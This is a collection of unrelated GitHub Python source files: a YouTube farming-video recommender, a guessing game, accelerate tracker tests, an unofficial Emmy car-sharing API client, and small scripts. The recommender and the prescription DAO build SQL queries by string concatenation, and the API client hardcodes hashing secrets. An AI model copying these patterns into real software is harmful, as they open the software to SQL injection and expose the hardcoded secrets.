not in punct])\n # Remove unicode text\n search_term = search_term.encode(encoding=\"ascii\", errors=\"ignore\").decode()\n\n # Split the text\n search_term = search_term.split()\n\n # Join with '+'\n search_term = '+'.join(search_term)\n\n # return search term\n return search_term\n\n\n# returns a list of titles\ndef extract_video_titles(video_ids):\n # Get title for each YouTube video\n titles_list = []\n for i in range(0, len(video_ids)):\n request = youtube.videos().list(\n part=\"snippet\",\n id=video_ids[i]\n )\n data = request.execute()\n # break_flag = False\n for video in data['items']:\n # Check title: if it is not farming: ignore this title (continue)\n title = video['snippet']['title']\n vectorized_title = [title]\n vectorized_title = vectorizer.transform(vectorized_title)\n prediction = loaded_model.predict(vectorized_title)\n if prediction == 1:\n titles_list.append(title)\n # break_flag = True\n # break\n # print('not farming video')\n # continue\n # if break_flag:\n # continue\n\n # Return title\n return titles_list\n\n\n# return a list of video ids\ndef search_youtube(search_term):\n # Search Youtube videos\n import urllib.request\n import re\n\n # search_keyword\n search_keyword = search_term\n\n html = urllib.request.urlopen(\"https://www.youtube.com/results?search_query=\" + search_keyword)\n video_ids = re.findall(r'watch\\?v=(\\S{11})', html.read().decode())\n\n # search results\n return video_ids\n\n\nsearch_word = 'fast farming'\nsearch_keyword = prepare_search_term(search_word)\n\n# Insert search term into SEARCH table\ntry:\n conn.execute(\"INSERT INTO SEARCH(search_term) VALUES('\" + search_word + \"');\")\n print('The search term: ' + search_word + ' is added Successfully')\n conn.commit()\nexcept Exception as e:\n print(e)\n print(\"search term \" + search_word + \"has been added before\")\n\n# Perform a YouTube search with the search word\nvideo_ids = search_youtube(prepare_search_term(search_word))\n\n# Insert videos into VIDEO table\n# Records or rows in a list\n# records = []\n# for i in range(len(video_ids)):\n# request = youtube.videos().list(\n# part=\"snippet\",\n# id=video_ids[i]\n# )\n# data = request.execute()\n# for video in data['items']:\n# title = video['snippet']['title']\n# records.append((title, video_ids[i]))\n\ncursor = conn.cursor()\n\n# insert multiple records\nfor i in range(len(video_ids)):\n request = youtube.videos().list(\n part=\"snippet\",\n id=video_ids[i]\n )\n data = request.execute()\n\n for video in data['items']:\n # Check title: if it is not farming: ignore this title (continue)\n title = video['snippet']['title']\n vectorized_title = [title]\n vectorized_title = vectorizer.transform(vectorized_title)\n prediction = loaded_model.predict(vectorized_title)\n if prediction == 1:\n try:\n conn.execute(\"INSERT INTO VIDEO(video_title,video_url_id) VALUES('\" + title + \"', '\" + video_ids[i] + \"');\")\n conn.commit()\n except BaseException as e:\n print(e)\n print(\"video \" + video_ids[i] + \"has been added before\")\n continue\n\nconn.execute(\"INSERT INTO SEARCH_VIDEO(search_id, video_id) \"\n \"SELECT SEARCH.search_id, VIDEO.video_id \"\n \"FROM SEARCH, VIDEO \"\n \"WHERE (SEARCH.search_term = '\" + search_word + \"');\")\nconn.commit()\n\ntitles = extract_video_titles(video_ids)\nkeywords = []\nfor i in range(0, 2):\n if i > 0:\n titles = new_titles\n for title in titles:\n # Insert title into SEARCH table\n # keywords.append(prepare_search_term(title))\n try:\n conn.execute(\"INSERT INTO SEARCH(search_term) VALUES('\" + title + \"');\")\n print('The search term: ' + title + ' is added Successfully')\n conn.commit()\n except Exception as e:\n print(e)\n print(\"search term \" + title + \"has been added before\")\n continue\n\n # Perform a YouTube search with the title\n video_ids = search_youtube(prepare_search_term(title))\n try:\n new_titles = extract_video_titles(video_ids)\n except Exception as e:\n print(e)\n continue\n\n cursor = conn.cursor()\n\n # insert multiple records\n for i in range(len(video_ids)):\n request = youtube.videos().list(\n part=\"snippet\",\n id=video_ids[i]\n )\n data = request.execute()\n for video in data['items']:\n title = video['snippet']['title']\n vectorized_title = [title]\n vectorized_title = vectorizer.transform(vectorized_title)\n prediction = loaded_model.predict(vectorized_title)\n if prediction == 1:\n try:\n conn.execute(\n \"INSERT INTO VIDEO(video_title,video_url_id) VALUES('\" + title + \"', '\" + video_ids[i] + \"');\")\n conn.commit()\n except BaseException as e:\n print(e)\n print(\"video \" + video_ids[i] + \"has been added before\")\n continue\n\n conn.execute(\"INSERT INTO SEARCH_VIDEO(search_id, video_id) \"\n \"SELECT SEARCH.search_id, VIDEO.video_id \"\n \"FROM SEARCH, VIDEO \"\n \"WHERE (SEARCH.search_term = '\" + search_word + \"');\")\n conn.commit()\n\nconn.close()\n","repo_name":"NajlaSaud/FarmingVideosRecommendationEngine","sub_path":"build_reco_db_iterate_search.py","file_name":"build_reco_db_iterate_search.py","file_ext":"py","file_size_in_byte":7951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71366067600","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python3 \nimport os\n\nfrom random import randrange\n \nnombrePropose = 0\n \nnombreMystere = randrange(1, 100)\n\n# print(nombreMystere)\n\nprint(\"------ JEU DU NOMBRE MYSTERE ------\")\n\n# Boucle du jeu \nwhile nombrePropose != nombreMystere:\n \n #on test le nombre saisi\n error = True\n while error:\n \n print(\"\\nQuel est le nombre ?\")\n \n nombrePropose = input()\n \n try: # On essaye de le convertir en entier\n nombrePropose = int(nombrePropose)\n if nombrePropose > 100 or nombrePropose < 1:\n print(\"Vous devez saisir un nombre compris entre 1 et 100\")\n else:\n error = False\n except ValueError:\n print(\"Vous n'avez pas saisi un nombre !\")\n\n #condition pour un nombre saisi trop petit\n if nombrePropose < nombreMystere:\n print(\"C'est trop petit ! \")\n if nombrePropose >= (nombreMystere - 5):\n print(\"Mais vous êtes très proche ! \\n\")\n elif nombrePropose >= (nombreMystere - 10):\n print(\"Mais vous êtes proche ! \\n\")\n\t\n\t#condition pour un nombre saisi trop grand\t\n elif nombrePropose > nombreMystere:\n print(\"C'est trop grand ! \")\n if nombrePropose <= (nombreMystere + 5):\n print(\"Mais vous êtes très proche ! \\n\")\n elif nombrePropose <= (nombreMystere + 10):\n print(\"Mais vous êtes proche ! \\n\")\n \n else:\n print(\"\\n ######################################################### \\n ### FELICITATION, vous avez trouvé le nombre mystere !!! \\n #########################################################\")\n\n \n\n\t\t\nos.system(\"pause\")\n ","repo_name":"NDECROIX/AlyraExo","sub_path":"Ex1.1/Ex1.1.1.py","file_name":"Ex1.1.1.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"42457440794","text":"import csv\nimport json\nimport logging\nimport os\nimport re\nimport tempfile\nimport unittest\nimport zipfile\nfrom pathlib import Path\nfrom typing import Optional\nfrom unittest import mock\n\n# We use TF to parse the logs\nfrom accelerate import Accelerator\nfrom accelerate.test_utils.testing import (\n MockingTestCase,\n TempDirTestCase,\n require_comet_ml,\n require_tensorboard,\n require_wandb,\n)\nfrom accelerate.tracking import CometMLTracker, GeneralTracker\nfrom accelerate.utils import is_comet_ml_available\n\n\nif is_comet_ml_available():\n from comet_ml import OfflineExperiment\n\nlogger = logging.getLogger(__name__)\n\n\n@require_tensorboard\nclass TensorBoardTrackingTest(unittest.TestCase):\n def test_init_trackers(self):\n project_name = \"test_project_with_config\"\n with tempfile.TemporaryDirectory() as dirpath:\n accelerator = Accelerator(log_with=\"tensorboard\", logging_dir=dirpath)\n config = {\"num_iterations\": 12, \"learning_rate\": 1e-2, \"some_boolean\": False, \"some_string\": \"some_value\"}\n accelerator.init_trackers(project_name, config)\n accelerator.end_training()\n for child in Path(f\"{dirpath}/{project_name}\").glob(\"*/**\"):\n log = list(filter(lambda x: x.is_file(), child.iterdir()))[0]\n self.assertNotEqual(str(log), \"\")\n\n def test_log(self):\n project_name = \"test_project_with_log\"\n with tempfile.TemporaryDirectory() as dirpath:\n accelerator = Accelerator(log_with=\"tensorboard\", logging_dir=dirpath)\n accelerator.init_trackers(project_name)\n values = {\"total_loss\": 0.1, \"iteration\": 1, \"my_text\": \"some_value\"}\n accelerator.log(values, step=0)\n accelerator.end_training()\n # Logged values are stored in the outermost-tfevents file and can be read in as a TFRecord\n # Names are randomly generated each time\n log = list(filter(lambda x: x.is_file(), Path(f\"{dirpath}/{project_name}\").iterdir()))[0]\n self.assertNotEqual(str(log), \"\")\n\n def test_logging_dir(self):\n with self.assertRaisesRegex(ValueError, \"Logging with `tensorboard` requires a `logging_dir`\"):\n _ = Accelerator(log_with=\"tensorboard\")\n with tempfile.TemporaryDirectory() as dirpath:\n _ = Accelerator(log_with=\"tensorboard\", logging_dir=dirpath)\n\n\n@require_wandb\n@mock.patch.dict(os.environ, {\"WANDB_MODE\": \"offline\"})\nclass WandBTrackingTest(TempDirTestCase, MockingTestCase):\n def setUp(self):\n super().setUp()\n # wandb let's us override where logs are stored to via the WANDB_DIR env var\n self.add_mocks(mock.patch.dict(os.environ, {\"WANDB_DIR\": self.tmpdir}))\n\n @staticmethod\n def get_value_from_log(key: str, log: str, key_occurrence: int = 0):\n \"\"\"\n Parses wandb log for `key` and returns the value.\n If parsing through multiple calls to .log, pass in a `key_occurrence`\n \"\"\"\n res = re.findall(rf\"(?<={key} )[^\\s]+\", log)[key_occurrence]\n if '\"' in res:\n return re.findall(r'\"([^\"]*)\"', res)[0]\n else:\n return res\n\n def test_init_trackers(self):\n project_name = \"test_project_with_config\"\n accelerator = Accelerator(log_with=\"wandb\")\n config = {\"num_iterations\": 12, \"learning_rate\": 1e-2, \"some_boolean\": False, \"some_string\": \"some_value\"}\n kwargs = {\"wandb\": {\"tags\": [\"my_tag\"]}}\n accelerator.init_trackers(project_name, config, kwargs)\n accelerator.end_training()\n # The latest offline log is stored at wandb/latest-run/*.wandb\n for child in Path(f\"{self.tmpdir}/wandb/latest-run\").glob(\"*\"):\n logger.info(child)\n if child.is_file() and child.suffix == \".wandb\":\n with open(child, \"rb\") as f:\n content = f.read()\n break\n\n # Check HPS through careful parsing and cleaning\n cleaned_log = re.sub(r\"[\\x00-\\x1f]+\", \" \", content.decode(\"utf8\", \"ignore\"))\n self.assertEqual(self.get_value_from_log(\"num_iterations\", cleaned_log), \"12\")\n self.assertEqual(self.get_value_from_log(\"learning_rate\", cleaned_log), \"0.01\")\n self.assertEqual(self.get_value_from_log(\"some_boolean\", cleaned_log), \"false\")\n self.assertEqual(self.get_value_from_log(\"some_string\", cleaned_log), \"some_value\")\n self.assertIn(\"my_tag\", cleaned_log)\n\n def test_log(self):\n project_name = \"test_project_with_log\"\n accelerator = Accelerator(log_with=\"wandb\")\n accelerator.init_trackers(project_name)\n values = {\"total_loss\": 0.1, \"iteration\": 1, \"my_text\": \"some_value\"}\n accelerator.log(values, step=0)\n accelerator.end_training()\n # The latest offline log is stored at wandb/latest-run/*.wandb\n for child in Path(f\"{self.tmpdir}/wandb/latest-run\").glob(\"*\"):\n if child.is_file() and child.suffix == \".wandb\":\n with open(child, \"rb\") as f:\n content = f.read()\n break\n # Check HPS through careful parsing and cleaning\n cleaned_log = re.sub(r\"[\\x00-\\x1f]+\", \" \", content.decode(\"utf8\", \"ignore\"))\n self.assertTrue(\"0.1\" in self.get_value_from_log(\"total_loss\", cleaned_log))\n self.assertTrue(\"1\" in self.get_value_from_log(\"iteration\", cleaned_log))\n self.assertTrue(\"some_value\" in self.get_value_from_log(\"my_text\", cleaned_log))\n self.assertTrue(\"0\" in self.get_value_from_log(\"_step\", cleaned_log))\n\n\n# Comet has a special `OfflineExperiment` we need to use for testing\ndef offline_init(self, run_name: str, tmpdir: str):\n self.run_name = run_name\n self.writer = OfflineExperiment(project_name=run_name, offline_directory=tmpdir)\n logger.info(f\"Initialized offline CometML project {self.run_name}\")\n logger.info(\"Make sure to log any initial configurations with `self.store_init_configuration` before training!\")\n\n\n@require_comet_ml\n@mock.patch.object(CometMLTracker, \"__init__\", offline_init)\nclass CometMLTest(unittest.TestCase):\n @staticmethod\n def get_value_from_key(log_list, key: str, is_param: bool = False):\n \"Extracts `key` from Comet `log`\"\n for log in log_list:\n j = json.loads(log)[\"payload\"]\n if is_param and \"param\" in j.keys():\n if j[\"param\"][\"paramName\"] == key:\n return j[\"param\"][\"paramValue\"]\n if \"log_other\" in j.keys():\n if j[\"log_other\"][\"key\"] == key:\n return j[\"log_other\"][\"val\"]\n if \"metric\" in j.keys():\n if j[\"metric\"][\"metricName\"] == key:\n return j[\"metric\"][\"metricValue\"]\n\n def test_init_trackers(self):\n with tempfile.TemporaryDirectory() as d:\n tracker = CometMLTracker(\"test_project_with_config\", d)\n accelerator = Accelerator(log_with=tracker)\n config = {\"num_iterations\": 12, \"learning_rate\": 1e-2, \"some_boolean\": False, \"some_string\": \"some_value\"}\n accelerator.init_trackers(None, config)\n accelerator.end_training()\n log = os.listdir(d)[0] # Comet is nice, it's just a zip file here\n # We parse the raw logs\n p = os.path.join(d, log)\n archive = zipfile.ZipFile(p, \"r\")\n log = archive.open(\"messages.json\").read().decode(\"utf-8\")\n list_of_json = log.split(\"\\n\")[:-1]\n self.assertEqual(self.get_value_from_key(list_of_json, \"num_iterations\", True), 12)\n self.assertEqual(self.get_value_from_key(list_of_json, \"learning_rate\", True), 0.01)\n self.assertEqual(self.get_value_from_key(list_of_json, \"some_boolean\", True), False)\n self.assertEqual(self.get_value_from_key(list_of_json, \"some_string\", True), \"some_value\")\n\n def test_log(self):\n with tempfile.TemporaryDirectory() as d:\n tracker = CometMLTracker(\"test_project_with_config\", d)\n accelerator = Accelerator(log_with=tracker)\n accelerator.init_trackers(None)\n values = {\"total_loss\": 0.1, \"iteration\": 1, \"my_text\": \"some_value\"}\n accelerator.log(values, step=0)\n accelerator.end_training()\n log = os.listdir(d)[0] # Comet is nice, it's just a zip file here\n # We parse the raw logs\n p = os.path.join(d, log)\n archive = zipfile.ZipFile(p, \"r\")\n log = archive.open(\"messages.json\").read().decode(\"utf-8\")\n list_of_json = log.split(\"\\n\")[:-1]\n self.assertEqual(self.get_value_from_key(list_of_json, \"curr_step\", True), 0)\n self.assertEqual(self.get_value_from_key(list_of_json, \"total_loss\"), 0.1)\n self.assertEqual(self.get_value_from_key(list_of_json, \"iteration\"), 1)\n self.assertEqual(self.get_value_from_key(list_of_json, \"my_text\"), \"some_value\")\n\n\nclass MyCustomTracker(GeneralTracker):\n \"Basic tracker that writes to a csv for testing\"\n _col_names = [\n \"total_loss\",\n \"iteration\",\n \"my_text\",\n \"learning_rate\",\n \"num_iterations\",\n \"some_boolean\",\n \"some_string\",\n ]\n\n name = \"my_custom_tracker\"\n requires_logging_directory = False\n\n def __init__(self, dir: str):\n self.f = open(f\"{dir}/log.csv\", \"w+\")\n self.writer = csv.DictWriter(self.f, fieldnames=self._col_names)\n self.writer.writeheader()\n\n @property\n def tracker(self):\n return self.writer\n\n def store_init_configuration(self, values: dict):\n logger.info(\"Call init\")\n self.writer.writerow(values)\n\n def log(self, values: dict, step: Optional[int]):\n logger.info(\"Call log\")\n self.writer.writerow(values)\n\n def finish(self):\n self.f.close()\n\n\nclass CustomTrackerTestCase(unittest.TestCase):\n def test_init_trackers(self):\n with tempfile.TemporaryDirectory() as d:\n tracker = MyCustomTracker(d)\n accelerator = Accelerator(log_with=tracker)\n config = {\"num_iterations\": 12, \"learning_rate\": 1e-2, \"some_boolean\": False, \"some_string\": \"some_value\"}\n accelerator.init_trackers(\"Some name\", config)\n accelerator.end_training()\n with open(f\"{d}/log.csv\", \"r\") as f:\n data = csv.DictReader(f)\n data = next(data)\n truth = {\n \"total_loss\": \"\",\n \"iteration\": \"\",\n \"my_text\": \"\",\n \"learning_rate\": \"0.01\",\n \"num_iterations\": \"12\",\n \"some_boolean\": \"False\",\n \"some_string\": \"some_value\",\n }\n self.assertDictEqual(data, truth)\n\n def test_log(self):\n with tempfile.TemporaryDirectory() as d:\n tracker = MyCustomTracker(d)\n accelerator = Accelerator(log_with=tracker)\n accelerator.init_trackers(\"Some name\")\n values = {\"total_loss\": 0.1, \"iteration\": 1, \"my_text\": \"some_value\"}\n accelerator.log(values, step=0)\n accelerator.end_training()\n with open(f\"{d}/log.csv\", \"r\") as f:\n data = csv.DictReader(f)\n data = next(data)\n truth = {\n \"total_loss\": \"0.1\",\n \"iteration\": \"1\",\n \"my_text\": \"some_value\",\n \"learning_rate\": \"\",\n \"num_iterations\": \"\",\n \"some_boolean\": \"\",\n \"some_string\": \"\",\n }\n self.assertDictEqual(data, truth)\n","repo_name":"tcarta/DLP","sub_path":"v0.13.2/accelerate-0.13.2/tests/test_tracking.py","file_name":"test_tracking.py","file_ext":"py","file_size_in_byte":11653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27053602423","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport requests\nfrom typing import List\n\nfrom EmmyAPI.model.reservation import Reservation\nfrom EmmyAPI.model.territory import Territory\nfrom EmmyAPI.util.hash import create_auth_string\nfrom EmmyAPI.auth import EmmyAuth\nfrom EmmyAPI.exeptions import handle_error_response, NotLoggedInException\nfrom EmmyAPI.model.user import User\nfrom EmmyAPI.model.car import Car, CarListItem\n\n\nclass EmmyAPI:\n\tAPI_URL = 'https://emio-frontend.com/api/prod/v2.07'\n\tURL_ENCODING_SHA1_PEPPER = [\n\t\t'r8UY7jvUVukMsVNENfGZDUaWnzBQccGx',\n\t\t'mHeWYBzWQ6dHshrmUJF7HKRMoRpwoMWj',\n\t\t'JZWsFxFv9frtVgLYUwPahTVG4WGyYLZW',\n\t\t'aVFGGdUx3Rt2rUYVyEDBFrvdKkFgaiMZ',\n\t]\n\tUSER_AGENT = 'CarSharing/1.99.7 (iPhone; iOS 12.1.4; Scale/2.00)'\n\n\tdef __init__(self, username, password, proxies=None, verify=True):\n\t\tself.username = username\n\t\tself.password = password\n\t\tself.user_id = None\n\t\tself.auth = None\n\t\tself.session = requests.Session()\n\t\tself.verify = verify\n\t\tproxies = proxies if proxies is not None else {}\n\t\tself.session.proxies.update(proxies)\n\t\tself.init_headers()\n\n\tdef init_headers(self):\n\t\tself.session.headers.update({\n\t\t\t'User-Agent': self.USER_AGENT,\n\t\t\t'Content-type': 'application/json',\n\t\t\t'Accept-Encoding': 'gzip, deflate',\n\t\t\t'Accept': 'application/json; charset=utf-8'\n\t\t})\n\n\t##########################\n\t# Endpoints\n\t##########################\n\n\tdef login(self, force=False) -> None:\n\t\t\"\"\"\n\t\tcalls /login endpoint\n\t\treceives an authentication token and saves it in session\n\n\t\t:param force: force user re-login if already logged in\n\t\t:rtype: None\n\t\t\"\"\"\n\n\t\tif not self._is_logged_in or force:\n\t\t\tpayload = {\"grant_type\": \"client_credentials\"}\n\t\t\theaders = {\n\t\t\t\t'Authorization': create_auth_string(self.username, self.password, self.URL_ENCODING_SHA1_PEPPER)\n\t\t\t}\n\n\t\t\tresponse = self._request('login', method='post', headers=headers, json=payload, login=True)\n\t\t\tresponse_json = response.json()\n\n\t\t\tself.auth = EmmyAuth(response_json.get('accessToken'))\n\t\t\tself.user_id = response_json.get('userId')\n\n\t# Users\n\t#####################################\n\n\tdef get_user_info(self) -> User:\n\t\t\"\"\"\n\t\t:return: User information object\n\t\t\"\"\"\n\t\tendpoint = 'users/{}'.format(self.user_id)\n\t\tresponse = self._request(endpoint, method='get')\n\t\treturn User(response.json())\n\n\t# Cars\n\t#####################################\n\n\tdef list_cars(self, lat, lon) -> List[CarListItem]:\n\t\tendpoint = 'cars'\n\t\tparams = {\n\t\t\t'lat': lat,\n\t\t\t'lon': lon,\n\t\t}\n\t\tresponse = self._request(endpoint, method='get', params=params)\n\t\treturn [CarListItem(item) for item in response.json()]\n\n\tdef get_car_info(self, car_id) -> Car:\n\t\tendpoint = 'cars/{}'.format(car_id)\n\t\tresponse = self._request(endpoint, method='get')\n\t\treturn Car(response.json())\n\n\tdef unlock_car(self, car_id: int or str):\n\t\tendpoint = 'users/{}/reservations/{}/car/unlock'.format(self.user_id, car_id)\n\t\tresponse = self._request(endpoint, method='post')\n\t\treturn Car(response.json())\n\n\tdef lock_car(self, car_id: int or str):\n\t\tendpoint = 'users/{}/reservations/{}/car/lock'.format(self.user_id, car_id)\n\t\tresponse = self._request(endpoint, method='post')\n\t\treturn Car(response.json())\n\n\t# Map\n\t#####################################\n\n\tdef get_cars_in_area(self,\n\t lat1: str or float,\n\t lat2: str or float,\n\t lon1: str or float,\n\t lon2: str or float) -> List[CarListItem]:\n\t\tendpoint = 'map/cars'\n\t\tparams = {\n\t\t\t'lat1': lat1,\n\t\t\t'lat2': lat2,\n\t\t\t'lon1': lon1,\n\t\t\t'lon2': lon2,\n\t\t}\n\t\tresponse = self._request(endpoint, method='get', params=params)\n\t\treturn [CarListItem(item) for item in response.json()]\n\n\tdef get_all_cars(self) -> List[CarListItem]:\n\t\tendpoint = 'map/cars'\n\t\tresponse = self._request(endpoint, method='get')\n\t\treturn [CarListItem(item) for item in response.json()]\n\n\tdef get_territories(self) -> List[Territory]:\n\t\tendpoint = 'territories/business'\n\t\tresponse = self._request(endpoint, method='get')\n\t\treturn [Territory(item) for item in response.json()]\n\n\t# todo: find out what this does\n\tdef locations(self):\n\t\tendpoint = 'locations'\n\t\tresponse = self._request(endpoint, method='get')\n\t\treturn response.json()\n\n\t# Reservations\n\t#####################################\n\n\tdef start_reservation(self, car_id: int or str) -> Reservation:\n\t\tendpoint = 'users/{}/reservations/new'.format(self.user_id)\n\t\tdata = {\n\t\t\t'carId': car_id,\n\t\t}\n\t\tresponse = self._request(endpoint, method='post', json=data)\n\t\treturn Reservation(response.json())\n\n\tdef end_reservation(self, reservation_id: int or str) -> Reservation:\n\t\tendpoint = 'users/{}/reservations/{}/end'.format(self.user_id, reservation_id)\n\t\tresponse = self._request(endpoint, method='put', )\n\t\treturn Reservation(response.json())\n\n\tdef get_reservation_info(self, reservation_id: int or str) -> Reservation:\n\t\tendpoint = 'users/{}/reservations/{}'.format(self.user_id, reservation_id)\n\t\tresponse = self._request(endpoint, method='get')\n\t\treturn Reservation(response.json())\n\n\t# General\n\t#####################################\n\n\tdef log(self, lat: str or float, lon: str or float, event_name: str) -> bool:\n\t\tendpoint = 'log'\n\t\tdata = {\n\t\t\t'data': {\n\t\t\t\t'lat': lat,\n\t\t\t\t'lon': lon,\n\t\t\t\t'userId': self.user_id,\n\t\t\t},\n\t\t\t'eventName': event_name,\n\t\t}\n\t\tresponse = self._request(endpoint, method='post', json=data)\n\t\treturn response.json().get('success')\n\n\tdef notifications(self) -> List:\n\t\tendpoint = 'notifications'\n\t\tresponse = self._request(endpoint, method='get')\n\t\treturn response.json()\n\n\t##########################\n\t# Private Methods\n\t##########################\n\n\tdef _request(\n\t\t\tself,\n\t\t\tendpoint: str,\n\t\t\tmethod: str,\n\t\t\theaders: dict = None,\n\t\t\tjson: dict = None,\n\t\t\tparams: dict = None,\n\t\t\tlogin: bool = False):\n\n\t\tif not self._is_logged_in and not login:\n\t\t\traise NotLoggedInException()\n\n\t\tadditional_headers = headers if headers is not None else {}\n\t\tlocal_params = params if params is not None else {}\n\n\t\tself.session.headers.update(additional_headers)\n\t\tr = requests.Request(\n\t\t\tmethod,\n\t\t\turl=self._api_url(endpoint),\n\t\t\tparams=local_params,\n\t\t\tjson=json,\n\t\t\tauth=self.auth)\n\t\tprepped = self.session.prepare_request(r)\n\n\t\tresponse = self.session.send(prepped, verify=self.verify)\n\t\tif response.status_code >= 400:\n\t\t\thandle_error_response(response)\n\n\t\treturn response\n\n\t@property\n\tdef _is_logged_in(self) -> bool:\n\t\treturn self.auth is not None\n\n\tdef _api_url(self, endpoint=''):\n\t\tif not endpoint.startswith('/'):\n\t\t\tendpoint = '/' + endpoint\n\t\tif not endpoint.endswith('/'):\n\t\t\tendpoint += '/'\n\t\treturn self.API_URL + endpoint\n","repo_name":"antonbaumann/emmy-api-python","sub_path":"EmmyAPI/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6546,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"40110351235","text":"from django.urls import path\nfrom roadmaps import views\n\napp_name = \"roadmaps\"\n\nurlpatterns = [\n path(\"\", views.RoadMapListView.as_view(), name=\"list\"),\n path(\"create/\", views.RoadMapCreateView.as_view(), name=\"create\"),\n path(\"/\", views.RoadMapDetailView.as_view(), name=\"detail\"),\n path(\"/update/\", views.RoadMapUpdateView.as_view(), name=\"update\"),\n]","repo_name":"isys35/DJANGO_2610_LESSONS","sub_path":"classroom/roadmaps/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32507125339","text":"from DatabaseConnection import connection\n\n#Class in charge of accessing the database with the information related to the prescriptions\nclass PrescriptionDAO:\n def create_prescription(treatment):\n conn = connection.Connection.make_connection()\n\n cur = conn.cursor()\n\n # Obtener el id del historial\n cur.execute(\"SELECT id FROM MedicalHistory WHERE patient_id=\" + str(treatment.patient_id))\n history_id = cur.fetchone()\n\n # Hacer el medical file\n cur.execute(\"INSERT INTO MedicalFile (date, type, history_id) VALUES (?, ?, ?)\", (treatment.date_created, \\\n treatment._type, history_id[0]))\n conn.commit()\n\n cur.execute(\"SELECT MAX(id) FROM MedicalFile\")\n file_id = cur.fetchone()\n\n # Hacer el treatment\n cur.execute(\"INSERT INTO Treatment (doctor_id, file_id) VALUES(?,?)\", \\\n (treatment.doctor_id, file_id[0]))\n conn.commit()\n\n cur.execute(\"SELECT MAX(id) FROM Treatment\")\n treatment_id = cur.fetchone()\n\n for x in range(0, len(treatment.description)):\n cur.execute(\"SELECT id FROM TreatmentItem WHERE name='\" + treatment.description[x] + \"'\")\n item_id = cur.fetchone()\n\n cur.execute(\"INSERT INTO TreatmentList(item_id, treatment_id, frequency, dose, administration) VALUES (?, ?, ?, ?, ?)\", (item_id[0], \\\n treatment_id[0], treatment.frequency_value[x] + \" \" + treatment.frequency[x], treatment.dose[x], treatment.administration[x]))\n conn.commit()\n\n conn.close()","repo_name":"richardmoonw/ENT_PlusHealth","sub_path":"src/Prescriptions/prescription_dao.py","file_name":"prescription_dao.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43813378333","text":"# 4485. 녹색 옷 입은 애가 젤다지?\n\nimport sys\nimport heapq\n\ntest_case = 0\nDELTA = [(0, 1), (0, -1), (1, 0), (-1, 0)]\n\nwhile True:\n test_case += 1\n N = int(sys.stdin.readline())\n if N == 0:\n break\n \n map_ = [list(map(int, sys.stdin.readline().split())) for _ in range(N)]\n cost = [[int(1e9)] * N for _ in range(N)]\n\n q = []\n heapq.heappush(q, (map_[0][0], 0, 0))\n \n while q:\n cur_cost, y, x = heapq.heappop(q)\n \n if y == N-1 and x == N-1:\n answer = cur_cost\n break\n \n for dy, dx in DELTA:\n ny, nx = y + dy, x + dx\n if not (0 <= ny < N and 0 <= nx < N):\n continue\n new_cost = map_[ny][nx] + cur_cost\n if cost[ny][nx] > new_cost:\n cost[ny][nx] = new_cost\n heapq.heappush(q, (new_cost, ny, nx))\n\n print(f'Problem {test_case}: {answer}')","repo_name":"KDT2-Algorithm-study/Algorithm-study","sub_path":"백준/4485/4485_김창조.py","file_name":"4485_김창조.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"9637740806","text":"import os\nimport torch\nimport torchvision.datasets as dset \nimport dataloaders.data_utils as utils\n\ndef define_dataloader(dataset='CIFAR10', data='data', batch_size=64):\n if dataset == 'CIFAR10':\n train_transform, valid_transform = utils._data_transforms_cifar10()\n train_data = dset.CIFAR10(root=data, train=True, download=True, transform=train_transform)\n valid_data = dset.CIFAR10(root=data, train=False, download=True, transform=valid_transform)\n elif dataset == 'CIFAR100':\n train_transform, valid_transform = utils._data_transforms_cifar100()\n train_data = dset.CIFAR100(root=data, train=True, download=True, transform=train_transform)\n valid_data = dset.CIFAR100(root=data, train=False, download=True, transform=valid_transform)\n elif dataset == 'SVHN':\n train_transform, valid_transform = utils._data_transforms_svhn()\n train_data = dset.SVHN(root=data, split='train', download=True, transform=train_transform)\n valid_data = dset.SVHN(root=data, split='test', download=True, transform=valid_transform)\n elif dataset == 'imagenet16-120':\n import torchvision.transforms as transforms\n from .DownsampledImageNet import ImageNet16\n mean = [x / 255 for x in [122.68, 116.66, 104.01]]\n std = [x / 255 for x in [63.22, 61.26, 65.09]]\n lists = [transforms.RandomHorizontalFlip(), transforms.RandomCrop(16, padding=2), transforms.ToTensor(), transforms.Normalize(mean, std)]\n train_transform = transforms.Compose(lists)\n train_data = ImageNet16(root=os.path.join(data,'imagenet16'), train=True, transform=train_transform, use_num_of_class_only=120)\n valid_data = ImageNet16(root=os.path.join(data,'imagenet16'), train=False, transform=train_transform, use_num_of_class_only=120)\n assert len(train_data) == 151700\n\n return torch.utils.data.DataLoader(train_data, batch_size=batch_size, shuffle=True, pin_memory=True, num_workers=4)\n\n","repo_name":"Tiaspetto/zero_cost_perf","sub_path":"dataloaders/dataloaders.py","file_name":"dataloaders.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"5207090225","text":"\"\"\"\n\" Analysis the inner server of weird DNS traffic based on the Weird Record\n\" The inner server means the inner Campus DNS server which involved in the weird behavior.\n\" Input: the target filename\n\" Output: the topK collected result from target file\n\" By Zhengping on 2019-01-08\n\"\"\"\n\nimport sys\nfrom collections import Counter\nimport json\nsys.path.append('/home/zhengping/DNS/DNSPythonWorkspace')\nfrom src.util.IPCluster import getIPCluster\n\ndef doCollectTask(filename, topK):\n \"\"\"\n Collect the topK result from filename\n :param filename: target filename\n :param topK: topK wants to select, by default is None.\n :return: top K count result.\n \"\"\"\n f = open(filename)\n dataDict = 